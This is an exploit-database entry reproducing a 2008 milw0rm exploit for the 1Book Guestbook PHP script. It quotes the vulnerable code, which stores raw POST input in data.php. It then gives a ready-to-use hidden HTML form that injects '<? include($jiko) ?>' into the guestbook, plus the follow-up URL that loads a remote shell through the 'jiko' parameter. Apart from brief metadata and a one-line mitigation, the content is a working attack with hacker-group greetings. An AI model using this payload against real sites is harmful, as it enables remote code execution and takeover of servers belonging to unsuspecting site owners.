1Book Guestbook Script Remote Code Execution

vendor:

1Book Guestbook Script

by:

jiko

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: 1Book Guestbook Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

1Book Guestbook Script Remote Code Execution

A vulnerability exists in 1Book Guestbook Script, where an attacker can inject malicious code in the variable $message and $username and then access the data.php file with the malicious code to execute arbitrary code.

Mitigation:

Input validation should be done to prevent malicious code injection.

Source

Exploit-DB raw data:

=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# email  : jalikom@hotmail.fr
# Home   : www.no-back.org & no-exploit.com
# Script  : 1Book Guestbook Script
# Bug   : remote code execution
# Download  : http://1scripts.net/scripts/1book.zip
=========================JIkI Team===================

 # if(in_array($_POST['username'], $bannedusers))
 # echo 'Your username has been banned by the administrator.<br/><br/>';
 # if(in_array($_SERVER['REMOTE_ADDR'], $bannedips))
 # echo 'Your IP has been banned by the administrator.<br/><br/>';
 # elseif($_POST['1'] + $_POST['2'] != $_POST['check'])
 # echo('You answered the security question incorrectly.');
 # else
 # {
 # $data = unserialize(file_get_contents('data.php'));
 # array_push($data, array('user' => $_POST['username'], 'date' =>
 mktime(), 'message' => $_POST['message'], 'website' =>
 $_POST['website'], 'ip' => $_SERVER['REMOTE_ADDR']));
 # file_put_contents('data.php', serialize($data));
 # }
 #
 #}

 #===========================================================================================================================#
 # So, we can write a malicious code like <?php include($jiko); ?> in
 the variable $message, and $username #
 # and then we go in
            http://Site/script/data/data.php?jiko=[shell]
 #
 #===========================================================================================================================#
 simple exploit whith HTML:
 -------------------------
 change site by your site
 +++++++++++++++++++++++++

 <title> EXploit BY JIKO</title>
 <center>
 <form method="post" action="site/guestbook.php">
 <input type=hidden name=username value="jiko was here" >
 <input type=hidden name=message value="<? include($jiko) ?>" >
 <input type=submit value="send">
 </form>
 <h5>a fter send your usage:
 <br>http://site/scripts/data.php?jiko=[shell]</h5>

 
=========================================================
 greetz:
 all my friend [kil1er & GhosT HaCkEr & stack ] and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com & no-exploit.com
=========================================================
**************************
 hello brother i want chnage my name Jiki Team to JiKo and my email to
 jalikom@hotmail.fr  and this a news bug
 remote code execution

# milw0rm.com [2008-06-03]